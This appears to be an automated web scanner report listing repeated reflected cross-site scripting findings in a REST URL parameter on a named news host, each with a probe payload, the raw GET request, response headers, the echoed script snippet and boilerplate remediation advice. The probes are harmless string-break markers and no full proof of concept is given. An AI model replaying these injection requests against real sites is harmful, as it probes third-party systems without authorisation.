<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928bb90';448814ce715/id-6a08f1abbeb54af69cb1816d8a39180b'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13c55'%3be4d98c85afd was submitted in the REST URL parameter 2. This input was echoed as 13c55';e4d98c85afd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409213c55'%3be4d98c85afd/Article_2011-01-30-Awards/id-85088ed0517649dd83e9f6521ccfc21a HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86391
Date: Mon, 31 Jan 2011 02:59:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409213c55';e4d98c85afd/id-85088ed0517649dd83e9f6521ccfc21a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22ecd'%3b53a8e306b85 was submitted in the REST URL parameter 2. This input was echoed as 22ecd';53a8e306b85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409222ecd'%3b53a8e306b85/Article_2011-01-30-Awards/id-ad7d216d56e342a58d2b1a78d81bee9f HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86396
Date: Tue, 01 Feb 2011 02:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69583
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409222ecd';53a8e306b85/id-ad7d216d56e342a58d2b1a78d81bee9f'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92c20'%3bc44140524e3 was submitted in the REST URL parameter 2. This input was echoed as 92c20';c44140524e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409292c20'%3bc44140524e3/Article_2011-01-30-Awards/id-d86371d349a441b499a59f24ed824b1e HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86378
Date: Tue, 01 Feb 2011 02:39:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73616
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409292c20';c44140524e3/id-d86371d349a441b499a59f24ed824b1e'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b733f'%3b0d43f6971bc was submitted in the REST URL parameter 2. This input was echoed as b733f';0d43f6971bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092b733f'%3b0d43f6971bc/Article_2011-01-30-Awards/id-d8e2444b6a1b49bf931c02b7841e3bfe HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 02:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71891
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092b733f';0d43f6971bc/id-d8e2444b6a1b49bf931c02b7841e3bfe'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 825f2'%3bad6fa172d70 was submitted in the REST URL parameter 2. This input was echoed as 825f2';ad6fa172d70 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092825f2'%3bad6fa172d70/Article_2011-01-30-Awards/id-e6b1e3e62d9346ad908c423b9a00059e HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86343
Date: Mon, 31 Jan 2011 02:59:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63603
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092825f2';ad6fa172d70/id-e6b1e3e62d9346ad908c423b9a00059e'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f375f'%3b4490338fcd6 was submitted in the REST URL parameter 2. This input was echoed as f375f';4490338fcd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092f375f'%3b4490338fcd6/Article_2011-01-30-Awards/id-fa2b19a0c71443848f5742e8e2edaa3d HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86380
Date: Tue, 01 Feb 2011 02:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69870
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092f375f';4490338fcd6/id-fa2b19a0c71443848f5742e8e2edaa3d'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670fe'%3b2fa73d0aaf was submitted in the REST URL parameter 2. This input was echoed as 670fe';2fa73d0aaf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092670fe'%3b2fa73d0aaf/Article_2011-01-30-Awards/id-fb271b398f7841a0a0f7a38010e600b1 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86394
Date: Mon, 31 Jan 2011 02:59:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092670fe';2fa73d0aaf/id-fb271b398f7841a0a0f7a38010e600b1'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48bec'%3b51380a848c8 was submitted in the REST URL parameter 2. This input was echoed as 48bec';51380a848c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409248bec'%3b51380a848c8/Article_2011-01-30-Berenstain%20Bears/id-68470f05edac4fefba924215b119ee15 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 18:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409248bec';51380a848c8/id-68470f05edac4fefba924215b119ee15'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d40f'%3b9da42588d2d was submitted in the REST URL parameter 2. This input was echoed as 7d40f';9da42588d2d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940927d40f'%3b9da42588d2d/Article_2011-01-30-Box%20Office/id-1278f09f460848fbbcc62b91871cd817 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 00:54:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940927d40f';9da42588d2d/id-1278f09f460848fbbcc62b91871cd817'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9945e'%3b257b5cb0a79 was submitted in the REST URL parameter 2. This input was echoed as 9945e';257b5cb0a79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940929945e'%3b257b5cb0a79/Article_2011-01-30-Box%20Office/id-154975e2b5cc494fb312dbc3647defab HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 00:54:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940929945e';257b5cb0a79/id-154975e2b5cc494fb312dbc3647defab'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d71ce'%3b5e19effc91f was submitted in the REST URL parameter 2. This input was echoed as d71ce';5e19effc91f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d71ce'%3b5e19effc91f/Article_2011-01-30-Box%20Office/id-48985ed6e51c4480a9db3287c640b521 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86346
Date: Sun, 30 Jan 2011 18:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58138
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d71ce';5e19effc91f/id-48985ed6e51c4480a9db3287c640b521'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8974f'%3b23d27581a99 was submitted in the REST URL parameter 2. This input was echoed as 8974f';23d27581a99 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940928974f'%3b23d27581a99/Article_2011-01-30-Box%20Office/id-a17279ed203046bba76de65c23a451e7 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86352
Date: Tue, 01 Feb 2011 02:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65788
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940928974f';23d27581a99/id-a17279ed203046bba76de65c23a451e7'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d681e'%3b72d2cb1b31 was submitted in the REST URL parameter 2. This input was echoed as d681e';72d2cb1b31 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092d681e'%3b72d2cb1b31/Article_2011-01-30-Box%20Office/id-ad4f700bbdc14747b141b1ec2de77981 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 00:54:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65246
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092d681e';72d2cb1b31/id-ad4f700bbdc14747b141b1ec2de77981'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea6eb'%3bd4b53f1ce0e was submitted in the REST URL parameter 2. This input was echoed as ea6eb';d4b53f1ce0e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092ea6eb'%3bd4b53f1ce0e/Article_2011-01-30-Directors%20Awards/id-0514e93f138842e386162886ad51f974 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86389
Date: Sun, 30 Jan 2011 18:32:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71346
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092ea6eb';d4b53f1ce0e/id-0514e93f138842e386162886ad51f974'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c41d'%3b2ce0b322dc3 was submitted in the REST URL parameter 2. This input was echoed as 5c41d';2ce0b322dc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925c41d'%3b2ce0b322dc3/Article_2011-01-30-Film%20Superman%20Casting/id-9a622d28c6a14ed883019e21ad29c704 HTTP/1.1
Host: hosted2.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=86400
Date: Mon, 31 Jan 2011 00:55:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57371
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925c41d';2ce0b322dc3/id-9a622d28c6a14ed883019e21ad29c704'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fcab'%3b4f3ddbec193 was submitted in the REST URL parameter 2. This input was echoed as 4fcab';4f3ddbec193 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
